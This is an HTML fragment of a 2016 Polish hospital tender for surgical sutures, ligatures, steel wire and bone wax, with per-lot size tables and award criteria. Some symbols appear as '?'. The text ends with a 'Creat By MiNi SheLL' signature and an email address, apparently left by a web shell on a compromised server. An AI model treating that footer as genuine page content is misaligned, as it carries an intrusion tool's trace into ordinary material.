<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.04.2016 godzina 10:00, miejsce: Wojewódzki Szpital Specjalistyczny im. M. Kopernika w Łodzi, Kancelaria Szpital, ul. Pabianicka 62, 93-513 Łódź..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1																
MONOFILAMENT SYNTETYCZNY, WCHŁANIALNY, BARWIONY, PODTRZYMUJĄCY TKANKI MIN. 10 TYGODNI, WCHŁANIAJĄCY SIĘ W OKRESIE 170-210 DNI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	3/0	70	20-22	?	okrągła	36 sasz.	op	 3    
2	3/0	70	25-27	?	okrągła	36 sasz.	op	 4    
3	0	70	30-32	1/2	okrągła	36 sasz.	op	 1    
4	2/0	70	25-27	?	okrągła	36 sasz.	op	 1    
5	2/0	70	29-32	?	okrągła	36 sasz.	op	 1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Jakość - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet 2																
Podwiązka syntetyczna na bazie kwasu mlekowego i glikolowego, pleciona, powlekana, barwiona, o podtrzymywaniu tkankowym min 75%  po 14 dniach po zaimplantowaniu, wchłaniająca się w okresie 56-70 dni.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	3/0	140	-	-	-	36 sasz.	op	6
2	2/0	12x45	-	-	-	36 sasz.	op	1
3	0	140	-	-	-	36 szsz.	op	21
4	1	140	-	-	-	36 sasz.	op	13
5	2	140	-	-	-	36 sasz.	op	5
6	2/0	140	-	-	-	36  sasz.	op	22.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Jakość - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet 3																
SZEW SYNTETYCZNY NA BAZIE KWASU MLEKOWEGO I GLIKOLOWEGO, PLECIONY, POWLEKANY, BARWIONY, O PODTRZYMYWANIU TKANKOWYM MIN.75% PO 14 DNIACH PO ZAIMPLANTOWANIU  W OKRESIE 56-70 DNI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	6/0	70	17-18	?	okrągła	36 sasz.	op	2
2	4/0	70	17-18	?	okrągła	36 sasz.	op	2
3	4/0	70	17-19	3/8	tnąca	36 sasz.	op	1
4	3/0	70	21-22	?	okrągła	36 sasz.	op	8
5	3/0	45	18-19	3/8	tnąca	36 sasz.	op	1
6	3/0	70	29-31	3/8	tnąca	36 sasz.	op	1
7	2/0	70	21-23	?	okrągła	36 sasz.	op	3
8	2/0	70	35-37	?	okrągła	36 sasz.	op	11
9	2/0	70	38-43	?	okrągła	36 sasz.	op	2
10	2/0	90	36-38	?	tnąca	36 sasz.	op	1
11	0	70	28-30	?	okrągła	36 sasz.	op	22
12	0	70	36-38	?	okrągła	36 sasz.	op	14
13	0	70	46-48	?	okrągła	36 sasz.	op	8
14	0	70	24-26	5/8	okrągła	36 sasz.	op	1
15	1	70	28-30	?	okrągła	36 sasz.	op	9
16	1	70	36-38	?	okrągła	36 sasz.	op	25
17	1	70	40-42	?	okrągła	36 sasz.	op	1
18	1	70	46-48	?	okrągła	36 sasz.	op	6
19	1	70	38-42	?	okrągła pogrubiona	36 sasz.	op	4
20	1	70	26-28	5/8	okrągła	36 sasz.	op	6
21	2	90	38-41	?	okrągła	24 sasz.	op	33
22	2	90	43-45	?	okrągła	24 sasz.	op	5
23	2	70	48-50	?	okrągła	24 sasz.	op	8
24	2	90	48-50	?	okrągła	24 sasz.	op	16
25	2	70	38-42	?	okrągła pogrubiona	36 sasz.	op	1
26	8/0	30	5-7	3/8	premium szpatułka	12  sasz.	op	1
27	7/0	30	5-7	3/8	premium szpatułka	12  sasz.	op	1
28	2/0	70	25-27	?	okrągła	36 sasz.	op	1
29	3/0	70	14-16	1/2	okrągła	36  sasz.	op	2
30	3/0	70	25-28	1/2	okrągła	36 sasz.	op	3
31	2/0	70	24-27	1/2	okrągła	36  sasz.	op	17
32	2/0	70	28-32	1/2	okrągła	36  sasz.	op	22
33	0	70	36-38	1/2	okrągła	36 sasz.	op	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Jakość - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet 4																
SZEW SYNTETYCZNY, PLECIONY, POWLEKANY O PODTRZYMYWANIU TKANKOWYM 50% PO 5 DNIACH, 0% PO 14 DNIACH OD ZAIMPLANTOWANIA,WCHŁANIAJĄCY SIĘ OKOŁO 42 DNI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	0	90	42-44	?	okrągła	36 sasz.	op. 	1
2	1	70	37-39	?	okrągła	36 sasz.	op. 	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Jakośc - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet 5																
SZEW SYNTETYCZNY, WCHŁANIALNY, MONOFILAMENT JEDNOWŁÓKNOWY, NIEPOWLEKANY BARWIONY PODTRZYMYWANIE TKANKOWE PO 14 DNIACH 100%, PO OK 90 DNIACH -50%, WCHŁANIAJĄCY SIĘ OK. 13 MIESIĘCY..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	1	150 PĘTLA	42-44	?	trokar pogrubiona	24 sasz.	op	16
2	1	150 PĘTLA	46-48	?	okrągła	24 sasz.	op	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Jakość - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet 6																
SZEW SYNTETYCZNY, JEDNOWŁÓKNOWY, BEZBARWNY , WCHŁAJĄNIĄCY SIĘ DO 56 DNI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	6/0	45	13-14	3/8	tnąca kosmetyczna	36 sasz.	op	 1      
2	5/0	45	11-12	3/8	tnąca kosmetyczna	12 sasz.	op	 2      
3	3/0	70	24-26	?	okrągła	36 sasz.	op	 1      
4	3/0	70	24-26	3/8	tnąca	36 sasz.	op	 7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Jakość - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet 7																
SZEW SYNTETYCZNY , JEDNOWŁÓKNOWY , O  PODTRZYMYWANIU TKANKOWYM 50% , PO 13-14 DNIACH OD ZAIMPLANTOWANIA , WCHŁANIAJĄCY 60-90 DNI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	5/0	70	14-16	3/8	tnąca	36 sasz.	op	1
2	4/0	70	16-18	?	okrągła	36 sasz.	op	9
3	4/0	70	16-18	3/8	tnąca	36 sasz.	op	10
4	4/0	45	18-20	3/8	tnąca	36 sasz.	op	6
5	4/0	70	19-21	3/8	tnąca	36 sasz.	op	11
6	3/0	140	-	-	-	36 sasz.	op	25
7	3/0	70	24-26	?	okrągła	36 sasz.	op	10
8	3/0	70	28-30	?	okrągła	36 sasz.	op	8
9	3/0	70	22-24	3/8	tnąca	36 sasz.	op	29
10	3/0	70	16-18	3/8	tnąca	36 sasz.	op	4
11	2/0	150	-	-	-	36 sasz.	op	44
12	2/0	70	20-23	?	okrągła	36 sasz.	op	6
13	2/0	70	24-26	?	okrągła	36 sasz.	op	23
14	2/0	70	28-30	?	okrągła	36 sasz.	op	37
15	2/0	70	24-26	?	okrągła pogrubiona	36 sasz.	op	5
16	2/0	70	46-52	?	okrągła	36 sasz.	op	3
17	2/0	70	24-26	?	tnąca	36 sasz.	op	7
18	2/0	70	28-30	?	tnąca	36 sasz.	op	1
19	2/0	70	36-38	?	tnąca	36 sasz.	op	3
20	0	140	-	-	-	36 sasz.	op	18
21	0	70	28-30	?	okrągła	36 sasz.	op	8
22	0	70	36-38	?	okrągła	36 sasz.	op	6
23	0	90	46-48	?	okrągła	36 sasz.	op	7
24	0	90	36-38	?	okrągła pogrubiona	36 sasz.	op	3
25	0	70	40-42	?	okrągła pogrubiona	36 sasz.	op	1
26	0	70	36-38	?	tnąca	36 sasz.	op	3
27	1	140	-	-	-	36 sasz.	op	1
28	1	70	28-30	?	okrągła	36 sasz.	op	2
29	1	70	36-38	?	okrągła	36 sasz.	op	4
30	1	90	48-50	?	okrągła	36 sasz.	op	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Jakość - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet 8																
SZEW SYNTETYCZNY, NA BAZIE GLIKOLIDU JEDNOWŁÓKNOWY, O  PODTRZYMYWANIU TKANKOWYM 4-5 TYGODNI , WCHŁANIAJĄCY SIĘ OD 90-110 DNI OD  ZAIMPLANTOWANIA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	4/0	75	18-20	3/8	tnąca	36 sasz.	op	1
2	3/0	75	24-26	?	okrągła	36 sasz.	op	10
3	3/0	75	24-26	3/8	tnąca	36 sasz.	op	1
4	2/0	75	22-24	?	okrągła	36 sasz.	op	1
5	2/0	75	25-27	?	okrągła	36 sasz.	op	4
6	2/0	75	36-38	?	okrągła cienka	36 sasz.	op	3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Jakość - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet 9																
SZEW SYNTETYCZNY NIEWCHŁANIALNY WYKONANY Z POLIPROPYLENU, NACZYNIOWY, BARWIONY..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	7/0	75	9-11	?	okrągła * 2	36 sasz.	op	1
2	6/0	45	11	3/8	tnąca kosmetyczna	36 sasz.	op	1
3	6/0	60	9-11	3/8	okrągła * 2	36 sasz.	op	1
4	5/0	75	12-14	?	okrągła * 2	36 sasz.	op	9
5	5/0	75	16-18	?	okrągła * 2	36 sasz.	op	6
6	4/0	75	16-18	?	okrągła * 2	36 sasz.	op	1
7	4/0	45	18-20	3/8	tnąca	36 sasz.	op	2
8	3/0	75	24-26	?	okrągła	36 sasz.	op	3
9	3/0	90	21-23	?	trokar * 2	36 sasz.	op	1
10	3/0	90	25-27	?	trokar * 2	36 sasz.	op	1
11	2/0	75	28-30	?	okrągła	36 sasz.	op	7
12	2/0	75	73-77	PROSTA	okrągła * 2	36 sasz.	op	3
13	4/0	90	20-22	1/2	okrągła * 2	36 sasz.	op	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Jakość - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet 10																
SZEW NIEWCHŁANIALNY, JEDNOWŁÓKNOWY, BARWIONY, POLIAMIDOWY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	4/0	45	16-18	3/8	tnąca	36 sasz.	op	13
2	3/0	75	18-20	3/8	tnąca	36 sasz.	op	46
3	3/0	75	23-26	1/2	tnąca	36 sasz.	op	0,5
4	2/0	90	28-32	3/8	tnąca	36 sasz.	op	16
5	2/0	90	38-40	3/8	tnąca	36 sasz.	op	35
6	2/0	100	44-46	3/8	tnąca	36 sasz.	op	7
7	2/0	100	58-62	3/8	tnąca	24 sasz.	op	1
8	0	75	38-40	3/8	tnąca	36 sasz.	op	21
9	0	90	38-40	3/8	tnąca	36 sasz.	op	16
10	0	100	58-62	3/8	tnąca	24 sasz.	op	1
11	1	75	38-40	3/8	tnąca	36 sasz.	op	3
12	5/0	45	16-18	3/8	tnąca	24 sasz.	op	5
13	3/0	75	28-30	3/8	tnąca	24 sasz.	op	2
14	2/0	45	24-26	3/8	tnąca	24 sasz.	op	10
15	2/0	45	28-32	3/8	tnąca	24 sasz.	op	17.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet 11																
SZEW NIEWCHŁANIALNY, PLECIONY, POLIESTROWY, POWLEKANY..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	1	75	36-38	?	okrągła	36 sasz.	op	2
2	2	75	36-38	?	okrągła pogrubiona	36 sasz.	op	16
3	3	150	-	-	-	36 sasz.	op	1
4	5	75	37-39	?	okrągła pogrubiona	36 sasz.	op	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Jakość - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pakiet 12																
SZEW NIEWCHŁANIALNY, PLECIONY, SYNTETYCZNY, POLIAMIDOWY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	2/0	75	26-28	?	okrągła	36 sasz.	op	6
2	0	75	28-32	?	okrągła	36 sasz.	op	1.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Jakość - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Pakiet 13																
SZEW  NIEWCHŁANIALNY, PLECIONY, JEDWABNY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	4/0	75	20-24	1/2	okrągła	36 sasz.	op	2
2	4/0	45	18-20	3/8	tnąca	36 sasz.	op	1
3	4/0	75	24-26	3/8	tnąca	36 sasz.	op	2
4	3/0	75	16-18	?	okrągła	36 sasz.	op	5
5	3/0	75	22-24	?	okrągła	36 sasz.	op	6
6	3/0	45	18-20	3/8	tnąca	36 sasz.	op	7
7	3/0	75	18-20	3/8	tnąca	36 sasz.	op	1
8	3/0	75	24-26	3/8	tnąca	36 sasz.	op	8
9	2/0	75	26-28	?	okrągła	36 sasz.	op	23
10	2/0	75	24-26	3/8	tnąca	36 sasz.	op	19
11	2/0	75	34-36	3/8	tnąca	36 sasz.	op	18
12	0	75	28-30	?	okrągła	36 sasz.	op	7
13	0	75	36-38	?	okrągła	36 sasz.	op	3
14	0	75	30-32	3/8	tnąca	36 sasz.	op	16
15	0	75	38-40	3/8	tnąca	36 sasz.	op	16
16	1	150	-	-	-	36 sasz.	op	1
17	1	75	38-40	3/8	tnąca	36 sasz.	op	4
18	2	75	36-38	?	okrągła	36 sasz.	op.	5
19	2	75	37-41	3/8	tnąca	36 sasz.	op.	13
20	2	75	75-80	3/8	tnąca * 2	24 sasz.	op.	4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Jakość - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> PAKIET 14																
SZEW NIEWCHŁANIALNY, LNIANY, POWLEKANY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	2/0	75	26-28	?	okrągła	36 sasz.	op.	4
2	0	2x75	-	-	-	36 sasz.	op.	1
3	0	10x75	-	-	-	36 sasz.	op.	2
4	0	75	26-28	?	okrągła	36 sasz.	op.	1
5	1	2 X 75	-	-	-	36 sasz.	op.	1
6	1	75	36-38	?	okrągła	36 sasz.	op.	2
7	3	150	-	-	-	36 sasz.	op.	1
8	2	2x75	-	-	-	36 sasz.	op.	2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Pakiet nr 15.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Szew ewentracyjny, stalowy, skręcony, powlekany o grubości 1,3 mm, długość 90 cm, zakończony dwiema igłami tnącymi. Wielkość igły 100 mm, krzywizna igły 3/8 koła plus dwie płytki polietylenowe.				2	4 sasz.	op.	11
2	Syntetyczna, wchłanialna taśma chirurgiczna, czas wchłaniania do 90 dni, długość nitki 60 cm, krzywizna igły ? koła, igła okrągła tempa ok. 65 mm.				3	6 sasz.	op.	4.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Jakość - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Pakiet nr 16  NIEWCHŁANIALNY MONOFILAMENT ZE STALI NIERDZEWNEJ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	4	Drut stalowy 4	45-47	 ?	okrągła zaostrzona 	12 sasz. (1 SASZ. 4 X 45)	op.	4
2	5	Drut stalowy 5	45-47	 ?	okrągła zaostrzona 	12 sasz. (1 SASZ. 4 X 45)	op.	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Jakość - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Pakiet nr 17.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wosk - preparat hemostatyczny, naturalny, tamujący krwawienie z kości. Waga 1 sasz. min. 2 g.				1	24 sasz.	op.	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.21-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Jakość - 40</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com